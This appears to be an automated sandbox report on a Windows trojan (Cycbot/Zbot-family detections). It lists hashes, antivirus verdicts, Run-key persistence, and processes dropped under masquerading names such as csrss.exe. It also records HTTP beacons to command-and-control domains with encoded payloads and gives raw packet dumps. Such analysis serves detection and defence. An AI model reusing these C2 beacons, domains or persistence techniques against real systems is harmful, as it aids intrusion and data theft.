Analysis Date2014-06-15 03:31:42
MD5ab6445844a26065988e9cce8c9ac5ccb
SHA1ff082886c007395ee37c5cc96704d2d07271edeb

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: c6cdf2f89b340f8c813f88859acf604f sha1: 0dfea2ff9308f11e2d8bf21c67cf8b576ef730d7 size: 166400
Section.rdata md5: 1e9b126f20e4355d40db44a3ef2df408 sha1: f444ae683e5b57c8d8fd0020926ed64b84fb9c00 size: 3072
Section.data md5: 12a0512a2f8173ccdbbbfc1331797db4 sha1: f17a175a2795ab03bcb9e0ee42e0ce0ac77dce3c size: 18944
Section.lib md5: 73eba7471a179347a9403f90f43611cb sha1: 202289b9de8a18720c37ed16b2a8b1aa40d3c02d size: 512
Timestamp2005-11-07 10:07:20
VersionPrivateBuild: 1532
PEhashe138dd7d6520ea66cb6c3b2162a2e7293bbbd38f
IMPhash3c42551b071ca67d92c65fe14e1c6eff
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Kazy.12933.psa
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Diple-13
AVDr. WebTrojan.Packed.1903
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KVW
AVFortinetW32/FraudLoad.MK!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVIkarusTrojan-Spy.Win32.Zbot
AVKasperskyTrojan.Win32.Diple.das
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.i
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanwinpe/Cycbot.BP
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.Gen
AVTrend MicroBKDR_CYCBOT.SMX
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{7791C364-DE4E-4000-9E92-9CCAFDDD90DC}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdifferentdata-one.com
Winsock DNS127.0.0.1
Winsock DNSfreemaildotaccess.com
Winsock DNSrossroadbags.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSrossroadbags.com
Type: A
50.56.218.189
DNSzonetf.com
Type: A
208.73.211.182
DNSzonetf.com
Type: A
208.73.211.177
DNSzonetf.com
Type: A
208.73.211.164
DNSzonetf.com
Type: A
208.73.211.249
DNSzonetf.com
Type: A
208.73.211.236
DNSfreemaildotaccess.com
Type: A
DNSdifferentdata-one.com
Type: A
HTTP GEThttp://rossroadbags.com/images/p_thumb/3521.jpg?tq=gP4aKydupIp7X5dDPllPE93IKXkMYe7BMJrpvJn37HPhaNM3xD8zdePR8UwhwToafyAx%2BomqQ8Tvp8qf4yioEUnY27%2BwYWo6cgKdgPKvwP8KNu%2BitZgWCHJE%2F0WiZRDLK6PWcobtkoUcNLRpXg%2Bkef7%2Bgn%2Ff6rByyoYE6ahNzvhNx8rb%2BuE6hEGug8CODLpZbRtNDMj2mMsFBnUhqt6CSfy7HbnX8bFoNfVc%2BoqREn9rG1UjkEoh5WGOdt2juCbHR5aXzV%2BGVobnHOyIzbVCeSMOrY2ahozctHCnr7n8h4QiMb35gbKLK8Kk4Fxkb1XSryWzsCtbx9iEeCsdyqPkE6J3MdtnmROPTgekBSXNMha0EtWdxxs2U2RwwGzOJkf7s6ihvTu36KAbGCAglYppDWp3rqL%2FNWTA%2BopTAt7EEicgtrxPXINkYEbzFv8i4PyDRT9h7IDZxP1sAPwSOnhQbntMH%2FQhU3Evuhk0oMRhJ7VmHWGQSetUUmos
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJuX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJuX%2BSNwVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJsX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 50.56.218.189:80
Flows TCP192.168.1.1:1032 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1033 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1034 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1035 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1036 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1037 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1038 ➝ 208.73.211.182:80
Flows TCP192.168.1.1:1039 ➝ 208.73.211.182:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 705f7468   GET /images/p_th
0x00000010 (00016)   756d622f 33353231 2e6a7067 3f74713d   umb/3521.jpg?tq=
0x00000020 (00032)   67503461 4b796475 70497037 58356444   gP4aKydupIp7X5dD
0x00000030 (00048)   506c6c50 45393349 4b586b4d 59653742   PllPE93IKXkMYe7B
0x00000040 (00064)   4d4a7270 764a6e33 37485068 614e4d33   MJrpvJn37HPhaNM3
0x00000050 (00080)   7844387a 64655052 38557768 77546f61   xD8zdePR8UwhwToa
0x00000060 (00096)   66794178 2532426f 6d715138 54767038   fyAx%2BomqQ8Tvp8
0x00000070 (00112)   71663479 696f4555 6e593237 25324277   qf4yioEUnY27%2Bw
0x00000080 (00128)   59576f36 63674b64 67504b76 7750384b   YWo6cgKdgPKvwP8K
0x00000090 (00144)   4e752532 4269745a 67574348 4a452532   Nu%2BitZgWCHJE%2
0x000000a0 (00160)   46305769 5a52444c 4b365057 636f6274   F0WiZRDLK6PWcobt
0x000000b0 (00176)   6b6f5563 4e4c5270 58672532 426b6566   koUcNLRpXg%2Bkef
0x000000c0 (00192)   37253242 676e2532 46663672 4279796f   7%2Bgn%2Ff6rByyo
0x000000d0 (00208)   59453661 684e7a76 684e7838 72622532   YE6ahNzvhNx8rb%2
0x000000e0 (00224)   42754536 68454775 6738434f 444c705a   BuE6hEGug8CODLpZ
0x000000f0 (00240)   6252744e 444d6a32 6d4d7346 426e5568   bRtNDMj2mMsFBnUh
0x00000100 (00256)   71743643 53667937 48626e58 3862466f   qt6CSfy7HbnX8bFo
0x00000110 (00272)   4e665663 2532426f 7152456e 39724731   NfVc%2BoqREn9rG1
0x00000120 (00288)   556a6b45 6f683557 474f6474 326a7543   UjkEoh5WGOdt2juC
0x00000130 (00304)   62485235 61587a56 25324247 566f626e   bHR5aXzV%2BGVobn
0x00000140 (00320)   484f7949 7a625643 65534d4f 72593261   HOyIzbVCeSMOrY2a
0x00000150 (00336)   686f7a63 7448436e 72376e38 68345169   hozctHCnr7n8h4Qi
0x00000160 (00352)   4d623335 67624b4c 4b384b6b 3446786b   Mb35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a593261   on: close....Y2a
0x00000150 (00336)   686f7a63 7448436e 72376e38 68345169   hozctHCnr7n8h4Qi
0x00000160 (00352)   4d623335 67624b4c 4b384b6b 3446786b   Mb35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6e 72376e38 68345169   ose....nr7n8h4Qi
0x00000160 (00352)   4d623335 67624b4c 4b384b6b 3446786b   Mb35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a75   OhLgjh88y%2BcoJu
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6e 72376e38 68345169   ose....nr7n8h4Qi
0x00000160 (00352)   4d623335 67624b4c 4b384b6b 3446786b   Mb35gbKLK8Kk4Fxk
0x00000170 (00368)   62315853 7279577a 73437462 78396945   b1XSryWzsCtbx9iE
0x00000180 (00384)   65437364 7971506b 45364a33 4d64746e   eCsdyqPkE6J3Mdtn
0x00000190 (00400)   6d524f50 5467656b 4253584e 4d686130   mROPTgekBSXNMha0
0x000001a0 (00416)   45745764 78787332 55325277 77477a4f   EtWdxxs2U2RwwGzO
0x000001b0 (00432)   4a6b6637 73366968 76547533 364b4162   Jkf7s6ihvTu36KAb
0x000001c0 (00448)   47434167 6c597070 44577033 72714c25   GCAglYppDWp3rqL%
0x000001d0 (00464)   32464e57 54412532 426f7054 41743745   2FNWTA%2BopTAt7E
0x000001e0 (00480)   45696367 74727850 58494e6b 5945627a   EicgtrxPXINkYEbz
0x000001f0 (00496)   46763869 34507944 52543968 3749445a   Fv8i4PyDRT9h7IDZ
0x00000200 (00512)   78503173 41507753 4f6e6851 626e744d   xP1sAPwSOnhQbntM
0x00000210 (00528)   48253246 51685533 45767568 6b306f4d   H%2FQhU3Evuhk0oM
0x00000220 (00544)   52684a37 566d4857 47515365 7455556d   RhJ7VmHWGQSetUUm
0x00000230 (00560)   6f732048 5454502f 312e300d 0a436f6e   os HTTP/1.0..Con
0x00000240 (00576)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x00000250 (00592)   486f7374 3a20726f 7373726f 61646261   Host: rossroadba
0x00000260 (00608)   67732e63 6f6d0d0a 41636365 70743a20   gs.com..Accept: 
0x00000270 (00624)   2a2f2a0d 0a557365 722d4167 656e743a   */*..User-Agent:
0x00000280 (00640)   206f7065 72612f38 2e31310d 0a0d0a      opera/8.11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 786c4b76 39373558   JuX%2BSNxlKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a72202f 3e0a2020   close....r />.  
